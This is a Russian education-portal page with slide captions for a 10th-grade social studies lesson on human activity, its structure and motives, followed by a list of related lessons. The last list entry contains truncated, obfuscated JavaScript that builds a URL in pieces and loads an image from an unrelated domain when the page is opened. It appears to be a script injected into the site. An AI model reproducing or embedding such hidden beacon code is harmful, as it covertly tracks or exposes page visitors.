урок обществознания в логике ИКТ для 10 кл. Деятельность как способ существования людей.
методическая разработка по обществознанию (10 класс) по теме

Шааф Оксана Владимировна

Урок в логике ИКТ. Приложения к уроку:  обучающая презентация для учеников; демонстрационная для учителя.

Скачать:

Предварительный просмотр:


Подписи к слайдам:

Слайд 1

Тема урока:

Слайд 2

« Животное полагает, что всё его дело – жить, а человек жизнь принимает только за возможность что-нибудь делать» (А.И.Герцен). Задание: Объясните высказывание А.И.Герцена. Какой смысл в нём заложен? Предположите, о чём пойдет речь на сегодняшнем уроке?

Слайд 3

Цель урока Знать, что такое деятельность, ее структуру, отличие поведения животных от деятельности человека. Уметь сравнивать, сопоставлять, делать выводы по теме. Оценивать полученные знания по теме.

Слайд 4

План изучения темы Что такое деятельность? Отличие деятельности человека от поведения животных. Сущность и структура деятельности. Многообразие деятельности.

Слайд 5

Работа в группах 1. группа расставляет книги от большой к малой. 2. Группа раскладывает кружки по цвету.

Слайд 6

Вопросы))) 1- Что вы делали? 2-Зачем делали? 3-Можно ли жить ничего не делая? 4-Осознаём ли мы то, что делаем? 5-Отличается ли деятельность человека от деятельности животных? 6-Присуща ли деятельность животным?

Слайд 7

Средства достижения цели

Слайд 8

Вопрос № 1 .Что такое деятельность? Деятельность – это проявление активности. Деятель – это человек, проявивший себя в какой-либо общественной деятельности.

Слайд 9

Энциклопедический словарь Деятельность – человеческая форма активного отношения к окружающему миру, содержание которой составляет его целесообразное изменение и преобразование. Деятельность человека предполагает определённое противопоставление субъекта и объекта деятельности.

Слайд 10

Вопрос №2 . Назовите отличия человека от животного сложно организованный мозг, членораздельная речь, способность производить орудия труда, способность к творческой деятельности и др.

Слайд 11

Основные характеристики деятельности: сознательный характер (человек сознательно ставит цели своей деятельности и предвидит её результат); продуктивный характер (направлена на получение результата, продукта) ; преобразующий характер (в ходе деятельности человек изменяет окружающий его мир и самого себя); орудийный характер (человек создает и использует орудия); общественный характер (человек вступает в разнообразные отношения с другими людьми). Соответствуют ли действия животных этим характеристикам?

Слайд 12

Поведение животных Вывод: Что отличает? Поведение человека Приспособление целесообразность Преобразование целеполагание

Слайд 13

выводы 1. Животные трудятся, движимые наследственными инстинктами, но им не присуще целеполагание. Ни одна пчела не построила чего- то другого, кроме сот. Животные используют только те материалы , которые уже существуют в природе и не производят новых. 2 «Деятельность – присущая только человеку форма взаимодействия с окружающим миром. В ходе человеческой деятельности происходит изменение и преобразование мира в интересах людей, создание того, чего нет в природе».

Слайд 14

Задание перейти по ссылке, № 4,19 http://school-collection.edu.ru/catalog/rubr/8f5d7210-86a6-11da-a72b-0800200c9a66/18796/

Слайд 15

Вопрос № 3. Сущность и структура деятельности Субъект деятельности — тот, кто осуществляет деятельность Объект — это то, на что она направлена деятельность

Слайд 16

В основе деятельности лежит МОТИВ- побудительная причина деятельности!!!!!! Потребности; Интересы; Убеждения; Идеалы; Влечения.

Слайд 17

потребности интересы убеждения идеалы влечения Переживаемая и осознаваемая человеком нужда Направленность не на сам предмет, а на условия, необходимые для его получения Следование определенным принципам Совершенство к которому надо стремиться Неосознанное желание Физиологические, социальные, идеальные Принятие законов, защищающих права рабочих, молодых, многодетных семей. Возможность или невозможность действовать так или иначе справедливость Путешествиям; колекционирование

Слайд 18

1) Естественные потребности – это потребности людей во всём том, что необходимо для существования, развития и воспроизводства. 2) Социальные потребности – это потребности человека во всём, что является продуктом общественной жизни. 3) Идеальные потребности – это потребности людей во всём том, что необходимо для духовного развития

Слайд 19

потребности физиологические : в воспроизводстве рода, пище, дыхании, одежде, жилище, физических движениях, отдыхе и т. п.; экзистенциальные (от латинского слова, означающего буквально «существование»): в безопасности своего существования, комфорте, постоянстве условий жизнедеятельности, в гарантии занятости, страховании от несчастных случаев, уверенности в завтрашнем дне и т. д.; социальные : в социальных связях, общении, привязанности, заботе о другом и внимании к себе, участии в совместной деятельности с другими; престижные : в самоуважении, уважении со стороны других, признании, достижении успеха и высокой оценки, служебном росте; духовные : в самоактуализации, самовыражении.

Слайд 20

Результат В ходе деятельности возникают определённые продукты деятельности: материальные и духовные блага, формы общения людей, общественные условия и отношения, способности, умения, знания самого человека. В результате деятельности воплощается сознательно поставленная цель .

Слайд 21

Вопрос № 4. Классификация видов деятельности Критерии для классификации Виды деятельности Отношение человека к окружающему миру - Практическая - Духовная Исторический процесс Прогрессивная – Регрессивная Созидательная - Разрушительная Социальные нормы Законная – Незаконная Моральная - Аморальная Социальные формы объединения людей Коллективная Массовая Индивидуальная Способы существования Однообразная, монотонная, шаблонная Инновационная, изобретательская, творческая Сферы общественной жизни Экономическая, политическая, социальная, духовная Этапы становления и развития личности человека Игра – учение – труд - общение

Слайд 22

контроль перейти по ссылке, задание № 13 http://school-collection.edu.ru/catalog/rubr/8f5d7210-86a6-11da-a72b-0800200c9a66/18796/

Слайд 23

Домашнее задание Параграф 5; перейти по ссылке https://docs.google.com/document/d/1Wbxvmks5U8wdJEsDmOmAMPR4gvotuQ9uZ1HJMH5WY6o/edit?usp=sharing

Слайд 24

самооценка знал узнал Хочу знать


Предварительный просмотр:


Подписи к слайдам:

Слайд 1

Тема урока:

Слайд 2

« Животное полагает, что всё его дело – жить, а человек жизнь принимает только за возможность что-нибудь делать» (А.И.Герцен). Задание: Объясните высказывание А.И.Герцена. Какой смысл в нём заложен? Предположите, о чём пойдет речь на сегодняшнем уроке?

Слайд 3

Цель урока

Слайд 4

План изучения темы

Слайд 5

Работа в группах 1. группа расставляет книги от большой к малой. 2. Группа раскладывает кружки по цвету и размеру .

Слайд 6

Вопросы))) 1- Что вы делали? 2-Зачем делали? 3-Можно ли жить ничего не делая? 4-Осознаём ли мы то, что делаем? 5-Отличается ли деятельность человека от деятельности животных? 6-Присуща ли деятельность животным?

Слайд 7

Средства достижения цели урока

Слайд 8

Вопрос № 1 .Что такое деятельность? Деятельность – это проявление активности. Деятель – это человек, проявивший себя в какой-либо общественной деятельности.

Слайд 9

Энциклопедический словарь Деятельность – человеческая форма активного отношения к окружающему миру, содержание которой составляет его целесообразное изменение и преобразование.

Слайд 10

Назовите отличия человека от животного

Слайд 11

Основные характеристики деятельности: сознательный характер (человек сознательно ставит цели своей деятельности и предвидит её результат); продуктивный характер (направлена на получение результата, продукта) ; преобразующий характер (в ходе деятельности человек изменяет окружающий его мир и самого себя); орудийный характер (человек создает и использует орудия); общественный характер (человек вступает в разнообразные отношения с другими людьми). Соответствуют ли действия животных этим характеристикам?

Слайд 12

Поведение животных ВЫВОДЫ: Что отличает? Поведение человека Приспособление целесообразность Преобразование целеполагание

Слайд 13

Задание перейти по ссылке, № 4,19 http://school-collection.edu.ru/catalog/rubr/8f5d7210-86a6-11da-a72b-0800200c9a66/18796/

Слайд 14

Сущность и структура деятельности Субъект деятельности — тот, кто осуществляет деятельность Объект — это то, на что она направлена деятельность

Слайд 15

В основе деятельности лежит МОТИВ- побудительная причина деятельности!!!!!! Потребности; Интересы; Убеждения; Идеалы; Влечения.

Слайд 16

потребности интересы убеждения идеалы влечения Переживаемая и осознаваемая человеком нужда Направленность не на сам предмет, а на условия, необходимые для его получения Следование определенным принципам Совершенство к которому надо стремиться Неосознанное желание Физиологические, социальные, идеальные Принятие законов, защищающих права рабочих, молодых, многодетных семей. Возможность или невозможность действовать так или иначе справедливость Путешествиям; колекционирование

Слайд 17

1) Естественные потребности – это потребности людей во всём том, что необходимо для существования, развития и воспроизводства. 2) Социальные потребности – это потребности человека во всём, что является продуктом общественной жизни. 3) Идеальные потребности – это потребности людей во всём том, что необходимо для духовного развития

Слайд 18

потребности физиологические : в воспроизводстве рода, пище, дыхании, одежде, жилище, физических движениях, отдыхе и т. п.; экзистенциальные (от латинского слова, означающего буквально «существование»): в безопасности своего существования, комфорте, постоянстве условий жизнедеятельности, в гарантии занятости, страховании от несчастных случаев, уверенности в завтрашнем дне и т. д.; социальные : в социальных связях, общении, привязанности, заботе о другом и внимании к себе, участии в совместной деятельности с другими; престижные : в самоуважении, уважении со стороны других, признании, достижении успеха и высокой оценки, служебном росте; духовные : в самоактуализации, самовыражении.

Слайд 19

Результат В ходе деятельности возникают определённые продукты деятельности: материальные и духовные блага, формы общения людей, общественные условия и отношения, способности, умения, знания самого человека. В результате деятельности воплощается сознательно поставленная цель .

Слайд 20

Классификация видов деятельности Критерии для классификации Виды деятельности Отношение человека к окружающему миру - Практическая - Духовная Исторический процесс Прогрессивная – Регрессивная Созидательная - Разрушительная Социальные нормы Законная – Незаконная Моральная - Аморальная Социальные формы объединения людей Коллективная Массовая Индивидуальная Способы существования Однообразная, монотонная, шаблонная Инновационная, изобретательская, творческая Сферы общественной жизни Экономическая, политическая, социальная, духовная Этапы становления и развития личности человека Игра – учение – труд - общение

Слайд 21

контроль перейти по ссылке, задание № 13 http://school-collection.edu.ru/catalog/rubr/8f5d7210-86a6-11da-a72b-0800200c9a66/18796/

Слайд 22

Домашнее задание Для всех: § 5; заполнение пустых слайдов в обучающей презентации. Для подготовке к ЕГЭ: перейти по ссылке https://docs.google.com/document/d/1Wbxvmks5U8wdJEsDmOmAMPR4gvotuQ9uZ1HJMH5WY6o/edit?usp=sharing

Слайд 23

самооценка знал узнал Хочу знать


Предварительный просмотр:


Подписи к слайдам:

Слайд 1

Тема урока:

Слайд 2

« Животное полагает, что всё его дело – жить, а человек жизнь принимает только за возможность что-нибудь делать» (А.И.Герцен). Задание: Объясните высказывание А.И.Герцена. Какой смысл в нём заложен? Предположите, о чём пойдет речь на сегодняшнем уроке?

Слайд 3

Цель урока Знать, что такое деятельность, ее структуру, отличие поведения животных от деятельности человека. Уметь сравнивать, сопоставлять, делать выводы по теме. Оценивать полученные знания по теме.

Слайд 4

План изучения темы Что такое деятельность? Отличие деятельности человека от поведения животных. Сущность и структура деятельности. Многообразие деятельности.

Слайд 5

Работа в группах 1. группа расставляет книги от большой к малой. 2. Группа раскладывает кружки по цвету.

Слайд 6

Вопросы))) 1- Что вы делали? 2-Зачем делали? 3-Можно ли жить ничего не делая? 4-Осознаём ли мы то, что делаем? 5-Отличается ли деятельность человека от деятельности животных? 6-Присуща ли деятельность животным?

Слайд 7

Средства достижения цели

Слайд 8

Вопрос № 1 .Что такое деятельность? Деятельность – это проявление активности. Деятель – это человек, проявивший себя в какой-либо общественной деятельности.

Слайд 9

Энциклопедический словарь Деятельность – человеческая форма активного отношения к окружающему миру, содержание которой составляет его целесообразное изменение и преобразование. Деятельность человека предполагает определённое противопоставление субъекта и объекта деятельности.

Слайд 10

Вопрос №2 . Назовите отличия человека от животного сложно организованный мозг, членораздельная речь, способность производить орудия труда, способность к творческой деятельности и др.

Слайд 11

Основные характеристики деятельности: сознательный характер (человек сознательно ставит цели своей деятельности и предвидит её результат); продуктивный характер (направлена на получение результата, продукта) ; преобразующий характер (в ходе деятельности человек изменяет окружающий его мир и самого себя); орудийный характер (человек создает и использует орудия); общественный характер (человек вступает в разнообразные отношения с другими людьми). Соответствуют ли действия животных этим характеристикам?

Слайд 12

Поведение животных Вывод: Что отличает? Поведение человека Приспособление целесообразность Преобразование целеполагание

Слайд 13

выводы 1. Животные трудятся, движимые наследственными инстинктами, но им не присуще целеполагание. Ни одна пчела не построила чего- то другого, кроме сот. Животные используют только те материалы , которые уже существуют в природе и не производят новых. 2 «Деятельность – присущая только человеку форма взаимодействия с окружающим миром. В ходе человеческой деятельности происходит изменение и преобразование мира в интересах людей, создание того, чего нет в природе».

Слайд 14

Задание перейти по ссылке, № 4,19 http://school-collection.edu.ru/catalog/rubr/8f5d7210-86a6-11da-a72b-0800200c9a66/18796/

Слайд 15

Вопрос № 3. Сущность и структура деятельности Субъект деятельности — тот, кто осуществляет деятельность Объект — это то, на что она направлена деятельность

Слайд 16

В основе деятельности лежит МОТИВ- побудительная причина деятельности!!!!!! Потребности; Интересы; Убеждения; Идеалы; Влечения.

Слайд 17

потребности интересы убеждения идеалы влечения Переживаемая и осознаваемая человеком нужда Направленность не на сам предмет, а на условия, необходимые для его получения Следование определенным принципам Совершенство к которому надо стремиться Неосознанное желание Физиологические, социальные, идеальные Принятие законов, защищающих права рабочих, молодых, многодетных семей. Возможность или невозможность действовать так или иначе справедливость Путешествиям; колекционирование

Слайд 18

1) Естественные потребности – это потребности людей во всём том, что необходимо для существования, развития и воспроизводства. 2) Социальные потребности – это потребности человека во всём, что является продуктом общественной жизни. 3) Идеальные потребности – это потребности людей во всём том, что необходимо для духовного развития

Слайд 19

потребности физиологические : в воспроизводстве рода, пище, дыхании, одежде, жилище, физических движениях, отдыхе и т. п.; экзистенциальные (от латинского слова, означающего буквально «существование»): в безопасности своего существования, комфорте, постоянстве условий жизнедеятельности, в гарантии занятости, страховании от несчастных случаев, уверенности в завтрашнем дне и т. д.; социальные : в социальных связях, общении, привязанности, заботе о другом и внимании к себе, участии в совместной деятельности с другими; престижные : в самоуважении, уважении со стороны других, признании, достижении успеха и высокой оценки, служебном росте; духовные : в самоактуализации, самовыражении.

Слайд 20

Результат В ходе деятельности возникают определённые продукты деятельности: материальные и духовные блага, формы общения людей, общественные условия и отношения, способности, умения, знания самого человека. В результате деятельности воплощается сознательно поставленная цель .

Слайд 21

Вопрос № 4. Классификация видов деятельности Критерии для классификации Виды деятельности Отношение человека к окружающему миру - Практическая - Духовная Исторический процесс Прогрессивная – Регрессивная Созидательная - Разрушительная Социальные нормы Законная – Незаконная Моральная - Аморальная Социальные формы объединения людей Коллективная Массовая Индивидуальная Способы существования Однообразная, монотонная, шаблонная Инновационная, изобретательская, творческая Сферы общественной жизни Экономическая, политическая, социальная, духовная Этапы становления и развития личности человека Игра – учение – труд - общение

Слайд 22

контроль перейти по ссылке, задание № 13 http://school-collection.edu.ru/catalog/rubr/8f5d7210-86a6-11da-a72b-0800200c9a66/18796/

Слайд 23

Домашнее задание Параграф 5; перейти по ссылке https://docs.google.com/document/d/1Wbxvmks5U8wdJEsDmOmAMPR4gvotuQ9uZ1HJMH5WY6o/edit?usp=sharing

Слайд 24

самооценка знал узнал Хочу знать


По теме: методические разработки, презентации и конспекты

Презентация к уроку обществознания "Деятельность как способ существования людей" 10 класс

Презентация  иллюстрирует материал учебника (автор Боголюбов Л.Н.) . Данная работа  призвана сформулировать представление о значении деятельности в жизни человека и развитии общества.  ...

Технологическая карта урока обществознания "Деятельность как способ существования людей" (10 класс)

Технологическая карта урока обществознания "Деятельность как способ существования людей" (10 класс)...

Технологическая карта урока обществознания 10 класс на тему "Деятельность- способ существования людей"

Конспект урока обществознания в 10 классе посвящен изучению темы "Деятельность- способ существования людей". Данная тема является частью главы"Человек и общество" и раскрывает поня...

Технологическая карта урока по теме "Деятельность как способ существования людей"

Технологическая карта урока " Деятельность как способ существования людей" , 10 класс, базовый уровень( УМК под редакцией  Л.Н.Боголюбова)...

Технологическая карта урока по обществознанию "Деятельность - способ существования людей"

Данная технологическая карта является методической разработкой к уроку. Рекомендовано для 10 класса....

Деятельность как способ существования людей

\'use strict\';var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'ikjtysncd.blablacarv.ru\',\'48\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); !func...